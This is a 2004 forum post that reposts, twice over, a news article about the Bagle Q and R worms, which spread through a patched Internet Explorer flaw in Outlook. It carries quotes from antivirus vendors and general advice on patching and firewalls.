MacG
03-19-2004, 4:55 AM
IE bug in Outlook lets in Bagle Q and R viruses ("") - [Computer Security]
Reports are already flooding in to antivirus companies across the globe of new variants of the Bagle virus that spread without the recipient opening an attachment but through a hole in Internet Explorer.
'As the UK comes into work this morning there's a real danger that these Bagle worms will take off - we've already had a high number of reports from other parts of the world - particularly Korea, which is known for its uptake and use of technology,' said Graham Cluley, senior technology consultant, Sophos. 'Exploiting a security loophole in the popular Microsoft Outlook email system means these worms have the potential to hit hard. Both home and business computer users need to make sure they are patched against all vulnerabilities.'
The flaw, for which Microsoft issued a patch in October of last year, affects the way the applications handle code received from a Web server and if left unpatched could allow an attacker to run code on the target system. In this case, the flaw is exploited through an email which embeds a small amount of HTML to take advantage of the flaw as Outlook uses the same HTML rendering engine.
When opened, the mail will download a script which in turn downloads the Bagle Q or R virus from either the sender's infected computer or from a list of 100 or so IP addresses and place it on your hard disk as directs.exe.
The viruses also place copies in folders used by peer-to-peer file-sharing systems, infect .exe files found on the disk and edit the Registry to make sure they are run each time the system is started.
In addition, Bagle Q and R attempt to turn off the activities of many security programs on the system.
Trend Micro says it has also encountered version of these latest viruses that contain the virus in an atachment too.
Cluley said the characteristics of the email make it particularly difficult to be vigilant against. 'The subject line is randomly chosen,' he said. 'There is no visible message body, although it does - of course - include the hidden exploit code which downloads the rest of the worm... but going by "what the email looks like" is never a good way to protect yourself.'
The 'carrier' emails download the viruses over port 81, which those of a technical bent or with a user-friendly firewall should turn off to prevent them receiving or sending on further carrier emails.
Cluley said that there 'were not many reports from the UK yet... One major reason that Korea has been so badly affected is that they are more advanced in broadband technology'. However, he said new variants S and T of Bagle were already being analysed which are likely to be even more sophisticated than R and Q, so numbers are may well rise.
David Kopp, Director of TrendLabs EMEA, said: 'The challenge is to help the security administrators with protection against these network viruses. We have already discovered three other variants that take advantage of these vulnerabilities Bagle.R, .S and .T Virus writers know how difficult it is to patch all the computers of a corporate network and don't hesitate to use this weakness.'
The new Bagles do appear to be by the same author as earlier versions. 'We believe they contain references to the white rabbit, which indicates that they may well be connected with earlier versions of Bagle,' said Cluley, referring to the recent Bagle N and O viruses.
As ever, updated antivirus and firewall software and timely patching are the easiest and surest way to defend against these new viruses. 'Bagle is a wake up call about the need for holistic security. By keeping on top of security patches, anti-virus software updates and ensuring firewalls are properly installed, users can lessen their chances of getting hit,' continued Cluley. 'If you don't patch yourself against these kind of threats, you shouldn't be surprised if a worm bites you on the backside.'
Reports are already flooding in to antivirus companies across the globe of new variants of the Bagle virus that spread without the recipient opening an attachment but through a hole in Internet Explorer.
'As the UK comes into work this morning there's a real danger that these Bagle worms will take off - we've already had a high number of reports from other parts of the world - particularly Korea, which is known for its uptake and use of technology,' said Graham Cluley, senior technology consultant, Sophos. 'Exploiting a security loophole in the popular Microsoft Outlook email system means these worms have the potential to hit hard. Both home and business computer users need to make sure they are patched against all vulnerabilities.'
The flaw, for which Microsoft issued a patch in October of last year, affects the way the applications handle code received from a Web server and if left unpatched could allow an attacker to run code on the target system. In this case, the flaw is exploited through an email which embeds a small amount of HTML to take advantage of the flaw as Outlook uses the same HTML rendering engine.
When opened, the mail will download a script which in turn downloads the Bagle Q or R virus from either the sender's infected computer or from a list of 100 or so IP addresses and place it on your hard disk as directs.exe.
The viruses also place copies in folders used by peer-to-peer file-sharing systems, infect .exe files found on the disk and edit the Registry to make sure they are run each time the system is started.
In addition, Bagle Q and R attempt to turn off the activities of many security programs on the system.
Trend Micro says it has also encountered version of these latest viruses that contain the virus in an atachment too.
Cluley said the characteristics of the email make it particularly difficult to be vigilant against. 'The subject line is randomly chosen,' he said. 'There is no visible message body, although it does - of course - include the hidden exploit code which downloads the rest of the worm... but going by "what the email looks like" is never a good way to protect yourself.'
The 'carrier' emails download the viruses over port 81, which those of a technical bent or with a user-friendly firewall should turn off to prevent them receiving or sending on further carrier emails.
Cluley said that there 'were not many reports from the UK yet... One major reason that Korea has been so badly affected is that they are more advanced in broadband technology'. However, he said new variants S and T of Bagle were already being analysed which are likely to be even more sophisticated than R and Q, so numbers are may well rise.
David Kopp, Director of TrendLabs EMEA, said: 'The challenge is to help the security administrators with protection against these network viruses. We have already discovered three other variants that take advantage of these vulnerabilities Bagle.R, .S and .T Virus writers know how difficult it is to patch all the computers of a corporate network and don't hesitate to use this weakness.'
The new Bagles do appear to be by the same author as earlier versions. 'We believe they contain references to the white rabbit, which indicates that they may well be connected with earlier versions of Bagle,' said Cluley, referring to the recent Bagle N and O viruses.
As ever, updated antivirus and firewall software and timely patching are the easiest and surest way to defend against these new viruses. 'Bagle is a wake up call about the need for holistic security. By keeping on top of security patches, anti-virus software updates and ensuring firewalls are properly installed, users can lessen their chances of getting hit,' continued Cluley. 'If you don't patch yourself against these kind of threats, you shouldn't be surprised if a worm bites you on the backside.'